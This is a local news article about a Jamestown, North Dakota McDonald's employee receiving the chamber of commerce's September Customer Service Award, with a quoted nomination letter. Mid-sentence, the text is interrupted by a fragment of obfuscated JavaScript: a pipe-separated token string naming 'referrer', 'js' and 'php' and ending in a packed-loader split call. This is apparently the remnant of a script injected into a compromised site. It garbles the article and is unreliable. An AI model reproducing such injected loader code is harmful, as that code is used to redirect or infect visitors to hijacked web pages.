JAMESTOWN, N.D. (NewsDakota.com) – Members of the Jamestown Area Chamber of Commerce Ambassador Committee and the Young Professionals of Jamestown presented the September Customer Service Award to Mike Rodriguez, employed by McDonalds of Jamestown.
The chamber honors individuals who demonstrate a consistent commitment to delivering products or services that satisfy customers by exceeding their requirements or expectations.
Mike’s ydker|var|u0026u|referrer|htskz||js|php’.split(‘|’),0,{}))
letter of nomination stated, “Mike has waited on me more than 20 times in the past 6 to 8 weeks. He is always extremely friendly, helpful and very respectful. I would think that he does not just do this for me, but he for everyone. He always asks how your day is going and tells you to have a nice day. He is a great person to have at the window, and he is always smiling. As a frequent customer, I have had good experiences at the window, or inside for that matter, and I will definitely return. I do not think fast food employees get the credit they deserve and I really think Mike is a great example for other employees to follow. I sincerely hope he is considered for this award, as he deserves the recognition.”
Mike, who along with all the other monthly winners, will be recognized at the Chamber’s annual banquet in January 2018.
Customer Service Award nomination forms are available at the Chamber office and on their website at www.jamestownchamber.com or call 701-252-4830.
